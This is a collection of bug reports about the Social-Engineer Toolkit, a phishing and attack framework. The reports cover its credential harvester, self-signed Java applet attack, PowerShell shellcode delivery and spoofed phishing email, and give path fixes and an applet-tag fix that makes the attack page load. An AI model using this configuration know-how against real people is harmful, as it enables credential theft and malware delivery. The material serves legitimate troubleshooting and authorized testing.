I recently came across this issue when testing out the self signing capabilities with the new version of Java just released. I received the following error and it tries to move the self signed applet to the 'program_junk' directory. However, this directory does not seem to exist anymore ;)

The signer certificate will expire within six months.
[*] Java Applet is now signed and will be imported into the website
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:mv: cannot move `Signed_Update.jar' to `../../program_junk/': Not a directory

After a looking through the code a bit I see that on line 44 of the /usr/share/set/src/html/unsigned/self_sign.py file the self sign module attempts to move the new self signed applet into the program_junk folder.

Current line 44:

subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)

After a bit of testing, I fixed this issue by editing line 44 in the /usr/share/set/src/html/unsigned/self_sign.py file to the following, so the module will move the self signed applet into the '~/.set/' directory.

Modified Line 44:

subprocess.Popen("mv Signed_Update.jar ~/set/", shell=True)

This works for me and I see the custom self signed certificate when prompted to run the java applet.

So much self signing in this issue wow :) Oh and I know getting a code signing cert is the way to go :)

Thanks!

Bug in Powershell Direct Shellcode Teensy Attack

Hi,

I'm trying to use this option in order to test the security of my computers, but I cannot get this option to work; all I have is this message:


set:arduino>12
[*] Generating the Powershell - Shellcode injection pde..

The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.

This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)

[!] Something went wrong, printing the error: name 'setdir' is not defined


I've googled this a little bit and I can't find a solution, this problem wasn't here in the previous versions of SET.

Is this coming from me? I'm running Kali Linux 1.0.5 and everything is up to date.

Binary 2 Teensy Attack (Deploy MSF payloads) error

Hello,

Because there is no reports folder in the main set folder, the attempt to generate the Binary 2 Teensy Attack (Deploy MSF payloads) failed with the error shown below. (Tested on a Kali VM)

[!] Something went wrong, printing the error: [Errno 2] No such file or directory: 'reports/binary2teensy.pde'

Regards,

Ettercap Path

I'm using SET with Kali and I get this error when I enable ettercap in the config file. The path is set to /usr/share/ettercap, so I'm not sure where the local part is coming from.

set> Site to redirect to attack machine [*]: *
[!] ERROR:An error has occured:
ERROR:[Errno 2] No such file or directory: '/usr/local/share/ettercap'

Python errors when using SSL with the credential harvester

Hey,

Been working on getting the credential harvester setup on 443 today and have been getting some strange errors. I can go through the paces of getting the self signed cert created and the credential harvester will say it is running on 443, but as soon as the first request comes in, I get the following error message (IP address scrubbed):

Enter PEM pass phrase:
----------------------------------------
Exception happened during processing of request from ('XXX.XXX.XXX.XXX', 51516)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 310, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 323, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 638, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 310, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python2.7/socket.py", line 476, in readline
    data = self._sock.recv(self._rbufsize)
Error: [('SSL routines', 'SSL23_GET_CLIENT_HELLO', 'http request')]
----------------------------------------

The only values changed in the set_config file are:

WEBATTACK_SSL=ON
SELF_SIGNED_CERT=ON

My set-automate file looks like this (scrubbed):

1
1
2
3
2
my.exter.nal.ip
https://siteimcloning.com/

Then I enter the data for the cert creation manually.

Any help would be appreciated!

'src' is not defined

When I tried to create a payload it gave me this error:

  1. Social-Engineering Attacks
    4) Create a Payload and Listener

set> 4

[!] Something went wrong, printing the error: name 'src' is not defined

logs
ERROR: 2013-10-29 11:23:52.252237: name 'src' is not defined
ERROR: 2013-10-29 11:16:26.175999: name 'src' is not defined

SE-Toolkit No module named src.core.setcore

Here is the whole error message:

Traceback (most recent call last):
File "/usr/bin/setoolkit", line 27, in <module>
from src.core.setcore import *
ImportError: No module named src.core.setcore

Anyone know a fix? Thanks.

Java Applet - Reverse HTTPS payload generation fail.

There seems to be a bug with changing the powershell payload to reverse_https when generating a Java applet. I pulled the most recent version down on 3 different machines (Kali, Debian 7, and Ubuntu 12.04) and replicated the issue. The error generated is as follows:
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders

[!] Something went wrong, printing the error: 'ascii' codec can't decode byte 0xfc in position 554: ordinal not in range(128)

If the reverse_tcp payload is used in the config file, the applet and payload are generated properly.

Please let me know if I can be of any further assistance in troubleshooting this issue.

Issues with smtp_web.py Source Email

Hello,

I believe I'm running into some bugs in 5.4.2 with the smtp_web.py module.
User tracking is set to ON.

Test case is as follows:

  1. Social-Engineering Attacks
  2. Website Attack Vectors
  3. Credential Harvester Attack Method
  4. Site Cloner

Specify my IP and an example site www.google.com,

  1. E-Mail Attack Single Email Address
    Enter in email,
  2. Use your own server or open relay. No auth.

Running Sendmail=1.

The open relay option specifies:

# Specify Open-Relay Option Here
if relay == '2':
    user1 = raw_input(setprompt(["1"], "From address (ex: [email protected])"))
    from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
    if sendmail == 0:
        user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
        pwd = getpass.getpass("Password for open-relay [blank]: ")

However, user1 isn't used; if sendmail == 1 the function is called like this on line 268:

if sendmail == 1:
    mailServer.sendmail(user, to, msg.as_string())

As a result this will die:
Dec 13 16:59:06 kali sm-mta[22741]: rBDLx6Fi022741: localhost [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-v4

Code needs love

Hey guys,

I started refactoring the command_center.py class file, because I found (using clone_digger) that most of the duplicated code we have here lives in that file.

Once I started doing some refactoring, I saw that it's a bigger problem than I thought: the project lacks some knowledge of Python style and rules (some simple things like starting class names with uppercase, basic OO and right scoping of things like variables and methods).

Another thing that I've noticed is that a lot of variables were named like: foo1, foo2, foo3. This makes it a lot harder for somebody who is trying to understand the code.

I have a few suggestions that I think might help:

  • every single piece of code that makes its way to the master branch needs to pass some kind of code review (even you @trustedsec :) ). That way we have a better chance to grow the codebase without creating an even bigger monster. I volunteer to do this.
  • start to improve classes one by one. Example: if someone makes a change or bugfix in command_center.py, that person should try to improve the class or method surrounding the one he is changing. That way, we will slowly start to see some improvements
  • keep an eye on clone_digger for code duplication

Just to be clear, I'm here to help and I really want to make this project's code better (like I tried to do in artillery here) and not just to criticize. This project is awesome and just needs some love (and hugs).

Java Applet not loading

Hi,
Been doing tests with SET and the Java Applet Attack Method, but when visiting the cloned page, the applet wouldn't load, even though I could see the applet code in the page source. I tested with Firefox, Chrome and IE with no luck.

After doing some research with the code of Webs that loaded Java Applets OK, I realised that it could be related to the order of the parameters in the applet code template; the file "src/webattack/web_clone/applet.database" looks like this:
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar">
So I moved the "code" parameter to the first position:
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar">
And now the applet shows up when loading the cloned pages! Could you fix it?

Thank you!

Possible path issue for SET interactive shell? Can't find setcore

First thanks to the SET team for all the great work, tons and tons of features.
I have tested this on a brand new Ubuntu Rackspace box and a fresh install of KALI with the same results so I suspect it's code related.

When creating a payload and listener for the SE interactive shell the listener start-up errors out. You can replicate the error by trying to start the listener from the payloads directory as well.

I added a print statement to confirm the path and also added the src/core directory before the import was called, just in case. In all scenarios the listener is unable to find the setcore module. Having reached the limit of my Python knowledge, I am directing it back to the gurus; the relevant output with the debug print statement is below.

root@temp-msf2:/usr/share/setoolkit/src/payloads/set_payloads# python listener.py
['/usr/share/setoolkit/src/payloads/set_payloads', '/usr/lib/python2.7', '/usr/lib/python2.7/plat-linux2', '/usr/lib/python2.7/lib-tk', '/usr/lib/python2.7/lib-old', '/usr/lib/python2.7/lib-dynload', '/usr/local/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages', '/usr/share/setoolkit/src/core']
Traceback (most recent call last):
File "listener.py", line 16, in <module>
from src.core.setcore import *
ImportError: No module named src.core.setcore
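An added example, not SET's own code, that reproduces the import failure seen in this report and in the "SE-Toolkit No module named src.core.setcore" report above on a constructed stand-in for the src/core tree: the dotted import `src.core.setcore` is only resolvable when the project root (the directory containing `src/`) is on sys.path, so adding `src/core` itself, as the debug output shows, cannot help. The fake tree, its `setprompt` stub and the helper names are assumptions for this example.

```python
import importlib
import os
import shutil
import sys
import tempfile


def make_fake_set_tree():
    """Throwaway tree shaped like SET's src/core/ (constructed, not SET's code)."""
    root = tempfile.mkdtemp(prefix="setoolkit_")
    core = os.path.join(root, "src", "core")
    os.makedirs(core)
    # __init__.py markers make 'src' and 'src.core' importable packages.
    open(os.path.join(root, "src", "__init__.py"), "w").close()
    open(os.path.join(core, "__init__.py"), "w").close()
    with open(os.path.join(core, "setcore.py"), "w") as fh:
        fh.write("def setprompt():\n    return 'set> '\n")
    return root


def try_import(extra_path):
    """Attempt listener.py's 'src.core.setcore' import with extra_path on sys.path.

    Returns True on success, False on ImportError. Cached modules are
    dropped first so each attempt is judged on the path entry alone.
    """
    for name in ("src.core.setcore", "src.core", "src"):
        sys.modules.pop(name, None)
    importlib.invalidate_caches()
    sys.path.insert(0, extra_path)
    try:
        importlib.import_module("src.core.setcore")
        return True
    except ImportError:
        return False
    finally:
        sys.path.remove(extra_path)


def demonstrate():
    """Return (result with src/core on sys.path, result with the root on it)."""
    root = make_fake_set_tree()
    try:
        # What the reporter tried: src/core itself. Python looks for a
        # top-level package named 'src' in each entry, so this still fails.
        wrong = try_import(os.path.join(root, "src", "core"))
        # The project root is the entry that makes 'src.core.setcore' resolve.
        right = try_import(root)
    finally:
        shutil.rmtree(root)
    return wrong, right
```

Running `demonstrate()` returns `(False, True)`: the same traceback the reporter saw with `src/core` on the path, and a clean import once the root is there instead.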
